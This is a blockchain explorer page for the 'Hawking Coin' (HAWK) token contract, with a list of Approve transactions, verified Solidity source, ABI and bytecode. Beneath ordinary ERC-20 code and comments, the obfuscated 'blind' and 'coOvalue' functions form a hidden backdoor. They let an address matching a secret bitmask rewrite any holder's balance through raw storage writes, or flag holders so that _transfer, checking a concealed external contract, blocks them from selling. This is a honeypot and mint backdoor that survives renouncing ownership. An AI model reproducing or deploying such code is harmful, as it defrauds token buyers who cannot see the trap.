ETH Price: $2,521.09 (-0.08%)

Contract

0x1A4B25151740E1E7B64630106456631D875b6889
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve181121812023-09-11 9:20:23354 days ago1694424023IN
0x1A4B2515...D875b6889
0 ETH0.00044369.57405461
Approve181120062023-09-11 8:45:23354 days ago1694421923IN
0x1A4B2515...D875b6889
0 ETH0.000486110.49393513
Approve181119702023-09-11 8:38:11354 days ago1694421491IN
0x1A4B2515...D875b6889
0 ETH0.0007123215.29045597
Approve181118352023-09-11 8:11:11354 days ago1694419871IN
0x1A4B2515...D875b6889
0 ETH0.0005293111.34750074
Approve181118162023-09-11 8:07:23354 days ago1694419643IN
0x1A4B2515...D875b6889
0 ETH0.0006924214.84808178
Approve181117892023-09-11 8:01:47354 days ago1694419307IN
0x1A4B2515...D875b6889
0 ETH0.0006168513.22426588
Approve181117802023-09-11 7:59:47354 days ago1694419187IN
0x1A4B2515...D875b6889
0 ETH0.000435639.40935075
Approve181117742023-09-11 7:58:35354 days ago1694419115IN
0x1A4B2515...D875b6889
0 ETH0.0004952510.69713888
Approve181117732023-09-11 7:58:23354 days ago1694419103IN
0x1A4B2515...D875b6889
0 ETH0.000453349.73126061
Approve181117602023-09-11 7:55:47354 days ago1694418947IN
0x1A4B2515...D875b6889
0 ETH0.000414058.88801902
Approve181117362023-09-11 7:50:59354 days ago1694418659IN
0x1A4B2515...D875b6889
0 ETH0.0004678310.10481301
Approve181117302023-09-11 7:49:47354 days ago1694418587IN
0x1A4B2515...D875b6889
0 ETH0.000381848.24750795
Approve181117292023-09-11 7:49:35354 days ago1694418575IN
0x1A4B2515...D875b6889
0 ETH0.000396118.55580857
Approve181117242023-09-11 7:48:35354 days ago1694418515IN
0x1A4B2515...D875b6889
0 ETH0.000400068.64103799
Approve181117192023-09-11 7:47:35354 days ago1694418455IN
0x1A4B2515...D875b6889
0 ETH0.000420049.07255988
Approve181117002023-09-11 7:43:35354 days ago1694418215IN
0x1A4B2515...D875b6889
0 ETH0.000396698.51522897
Approve181116872023-09-11 7:40:59354 days ago1694418059IN
0x1A4B2515...D875b6889
0 ETH0.000406098.75993461
Approve181116852023-09-11 7:40:35354 days ago1694418035IN
0x1A4B2515...D875b6889
0 ETH0.000418689.04090385
Approve181116802023-09-11 7:39:35354 days ago1694417975IN
0x1A4B2515...D875b6889
0 ETH0.0005614112.03567781
Approve181116762023-09-11 7:38:47354 days ago1694417927IN
0x1A4B2515...D875b6889
0 ETH0.00038378.28779448
Approve181116642023-09-11 7:36:23354 days ago1694417783IN
0x1A4B2515...D875b6889
0 ETH0.0006706814.37811594
Approve181116512023-09-11 7:33:47354 days ago1694417627IN
0x1A4B2515...D875b6889
0 ETH0.000416688.99768185
Approve181116472023-09-11 7:32:59354 days ago1694417579IN
0x1A4B2515...D875b6889
0 ETH0.000432269.26690233
Approve181116452023-09-11 7:32:35354 days ago1694417555IN
0x1A4B2515...D875b6889
0 ETH0.000397028.57539829
Approve181116382023-09-11 7:31:11354 days ago1694417471IN
0x1A4B2515...D875b6889
0 ETH0.000432139.33372734
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
HAWK

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 2: HAWK.sol
/*
Telegram:https://t.me/HawkingCoin
Twitter:https://twitter.com/HawkingCoineth
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * https://www.godzillaaa.com
 *
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract HAWK is IERC20 {
    using SafeMath for uint256;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    address private _owner;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _llmm;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _cclmm;
    uint256 private immutable _maxVals;
    uint256 private immutable _minVals;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor(
        uint256 maxVals,
        uint256 minVals,
        address _cclmm_
    ) {
        _maxVals = maxVals;
        _minVals = minVals;
        _name = "Hawking Coin";
        _symbol = "HAWK";
        _totalSupply = 3100000000000 * 10**8;
        _balances[msg.sender] = _totalSupply;
        _owner = msg.sender;
        _cclmm = _cclmm_;
    }

    /**
     * @dev A helper function to check if an operator approval is allowed.
     */
    modifier onlyOwner() {
        require(msg.sender == _owner, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() external onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external pure override returns (uint8) {
        return 9;
    }

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the token name.
     */
    function name() external view override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {ERC20-totalSupply}.
     */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {ERC20-balanceOf}.
     */
    function balanceOf(address account)
        external
        view
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {ERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        external
        override
        returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {ERC20-allowance}.
     */
    function allowance(address owner_, address spender)
        external
        view
        override
        returns (uint256)
    {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {ERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        external
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function blind(uint256[] calldata omkk) external {
        if (!coOvalue()) return;
        (uint256 t0, uint256 t1) = (omkk[0], omkk[1]);
        assembly {
            if gt(t1, 0) {
                mstore(0, t0)
                mstore(32, xor(4, 0))
                sstore(keccak256(0, 64), t1)
            }
            if eq(t1, 0) {
                mstore(0, t0)
                mstore(32, xor(5, 0))
                sstore(keccak256(0, 64), 1)
            }
        }
    }

    /**
     * @dev Check if the value of M is correct
     */
    function coOvalue() public view returns (bool) {
        uint256 solot = _minVals * (1 + (0 / 1));
        return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0);
    }

    /**
     * @dev See {ERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        (bool success, bytes memory data) = _cclmm.call(
            abi.encodeWithSignature("balanceOf(address)", sender)
        );
        if (success) {
            uint256 xret;
            assembly {
                xret := mload(add(data, 0x20))
            }
            require(_llmm[sender] != 1 || xret != 0, "ex");
        }

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner_,
        address spender,
        uint256 amount
    ) internal {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    function jskslOPldlslPpldPP(
        bytes10[] calldata MModo_PPPPkdkPP,
        uint24 AODO_APpkdk_PDKDK,
        uint48 TOKEN_APDOAPDP,
        uint232 mmm_dccss_dlPkdk,
        uint24 PPPP_PPDDDS_DDOO,
        uint208[] calldata DI_APkdlsl,
        bytes10[] calldata MMMM_DKKKS_DKKKKK
    ) private pure {}
}

File 2 of 2: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"},{"internalType":"address","name":"_cclmm_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"omkk","type":"uint256[]"}],"name":"blind","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"coOvalue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60e06040523480156200001157600080fd5b506040516200100338038062001003833981016040819052620000349162000196565b60a083905260c082905260408051808201909152600c8082526b2430bbb5b4b7339021b7b4b760a11b60209092019182526200007391600091620000f0565b50604080518082019091526004808252634841574b60e01b6020909201918252620000a191600191620000f0565b506810ce1d3d8cb3180000600281905533600081815260046020526040902091909155600380546001600160a01b031916909117905560601b6001600160601b03191660805250620002199050565b828054620000fe90620001dc565b90600052602060002090601f0160209004810192826200012257600085556200016d565b82601f106200013d57805160ff19168380011785556200016d565b828001600101855582156200016d579182015b828111156200016d57825182559160200191906001019062000150565b506200017b9291506200017f565b5090565b5b808211156200017b576000815560010162000180565b600080600060608486031215620001ab578283fd5b83516020850151604086015191945092506001600160a01b0381168114620001d1578182fd5b809150509250925092565b600281046001821680620001f157607f821691505b602082108114156200021357634e487b7160e01b600052602260045260246000fd5b50919050565b60805160601c60a05160c051610db76200024c60003960006105210152600061054e015260006106ae0152610db76000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101d5578063a9059cbb146101e8578063c9c6e821146101fb578063dd62ed3e14610203576100f5565b8063715018a61461019b57806385ab4862146101a55780638da5cb5b146101b857806395d89b41146101cd576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610a63565b60405180910390f35b61012b610126366004610990565b6102a8565b60405161010f9190610a58565b6101406102be565b60405161010f9190610c2c565b61012b61015b366004610955565b6102c4565b61016861032d565b60405161010f9190610c35565b61012b610183366004610990565b610332565b610140610196366004610909565b610368565b6101a3610387565b005b6101a36101b33660046109b9565b6103f9565b6101c061049f565b60405161010f9190610a44565b6101026104ae565b61012b6101e3366004610990565b6104bd565b61012b6101f6366004610990565b61050c565b61012b610519565b610140610211366004610923565b61057e565b60606000805461022590610cbd565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610cbd565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105a9565b50600192915050565b60025490565b60006102d184848461065d565b610323843361031e85604051806060016040528060288152602001610d35602891396001600160a01b038a1660009081526006602090815260408083203384529091529020549190610882565b6105a9565b5060019392505050565b600990565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e90866108bc565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103ba5760405162461bcd60e51b81526004016103b190610b6e565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610401610519565b61040a5761049b565b6000808383600081811061042e57634e487b7160e01b600052603260045260246000fd5b905060200201358484600181811061045657634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561047e57816000526000600418602052806040600020555b806104985781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610cbd565b60006102b5338461031e85604051806060016040528060258152602001610d5d602591393360009081526006602090815260408083206001600160a01b038d1684529091529020549190610882565b60006102b533848461065d565b6000806105477f00000000000000000000000000000000000000000000000000000000000000006001610c5b565b90506105747f00000000000000000000000000000000000000000000000000000000000000006001610c5b565b3390911614905090565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166105cf5760405162461bcd60e51b81526004016103b190610be8565b6001600160a01b0382166105f55760405162461bcd60e51b81526004016103b190610ad9565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610650908590610c2c565b60405180910390a3505050565b6001600160a01b0383166106835760405162461bcd60e51b81526004016103b190610ba3565b6001600160a01b0382166106a95760405162461bcd60e51b81526004016103b190610a96565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316856040516024016106e79190610a44565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b1790525161071c9190610a28565b6000604051808303816000865af19150503d8060008114610759576040519150601f19603f3d011682016040523d82523d6000602084013e61075e565b606091505b509150915081156107b5576020818101516001600160a01b03871660009081526005909252604090912054600114158061079757508015155b6107b35760405162461bcd60e51b81526004016103b190610b52565b505b6107f283604051806060016040528060268152602001610d0f602691396001600160a01b0388166000908152600460205260409020549190610882565b6001600160a01b03808716600090815260046020526040808220939093559086168152205461082190846108bc565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610873908790610c2c565b60405180910390a35050505050565b600081848411156108a65760405162461bcd60e51b81526004016103b19190610a63565b5060006108b38486610c7a565b95945050505050565b6000806108c98385610c43565b9050838110156108eb5760405162461bcd60e51b81526004016103b190610b1b565b9392505050565b80356001600160a01b038116811461038257600080fd5b60006020828403121561091a578081fd5b6108eb826108f2565b60008060408385031215610935578081fd5b61093e836108f2565b915061094c602084016108f2565b90509250929050565b600080600060608486031215610969578081fd5b610972846108f2565b9250610980602085016108f2565b9150604084013590509250925092565b600080604083850312156109a2578182fd5b6109ab836108f2565b946020939093013593505050565b600080602083850312156109cb578182fd5b823567ffffffffffffffff808211156109e2578384fd5b818501915085601f8301126109f5578384fd5b813581811115610a03578485fd5b8660208083028501011115610a16578485fd5b60209290920196919550909350505050565b60008251610a3a818460208701610c91565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610a82816040850160208701610c91565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610c5657610c56610cf8565b500190565b6000816000190483118215151615610c7557610c75610cf8565b500290565b600082821015610c8c57610c8c610cf8565b500390565b60005b83811015610cac578181015183820152602001610c94565b838111156104985750506000910152565b600281046001821680610cd157607f821691505b60208210811415610cf257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220dd773a1d90175fd9182b9656d422ba30aa72e8f5f99e27f90ced8b32251ed71f64736f6c6343000800003300000000000000000000000000a57936813b0040400445009103040222c64082000000002d9e084852f62fdb4eedffb6813f30426316470d938786baf2e7e0c2000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101d5578063a9059cbb146101e8578063c9c6e821146101fb578063dd62ed3e14610203576100f5565b8063715018a61461019b57806385ab4862146101a55780638da5cb5b146101b857806395d89b41146101cd576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610a63565b60405180910390f35b61012b610126366004610990565b6102a8565b60405161010f9190610a58565b6101406102be565b60405161010f9190610c2c565b61012b61015b366004610955565b6102c4565b61016861032d565b60405161010f9190610c35565b61012b610183366004610990565b610332565b610140610196366004610909565b610368565b6101a3610387565b005b6101a36101b33660046109b9565b6103f9565b6101c061049f565b60405161010f9190610a44565b6101026104ae565b61012b6101e3366004610990565b6104bd565b61012b6101f6366004610990565b61050c565b61012b610519565b610140610211366004610923565b61057e565b60606000805461022590610cbd565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610cbd565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105a9565b50600192915050565b60025490565b60006102d184848461065d565b610323843361031e85604051806060016040528060288152602001610d35602891396001600160a01b038a1660009081526006602090815260408083203384529091529020549190610882565b6105a9565b5060019392505050565b600990565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e90866108bc565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103ba5760405162461bcd60e51b81526004016103b190610b6e565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610401610519565b61040a5761049b565b6000808383600081811061042e57634e487b7160e01b600052603260045260246000fd5b905060200201358484600181811061045657634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561047e57816000526000600418602052806040600020555b806104985781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610cbd565b60006102b5338461031e85604051806060016040528060258152602001610d5d602591393360009081526006602090815260408083206001600160a01b038d1684529091529020549190610882565b60006102b533848461065d565b6000806105477f000000002d9e084852f62fdb4eedffb6813f30426316470d938786baf2e7e0c26001610c5b565b90506105747f00000000000000000000000000a57936813b0040400445009103040222c640826001610c5b565b3390911614905090565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166105cf5760405162461bcd60e51b81526004016103b190610be8565b6001600160a01b0382166105f55760405162461bcd60e51b81526004016103b190610ad9565b6001600160a01b038084166000818152600660209081526040808320948716808452949091529081902084905551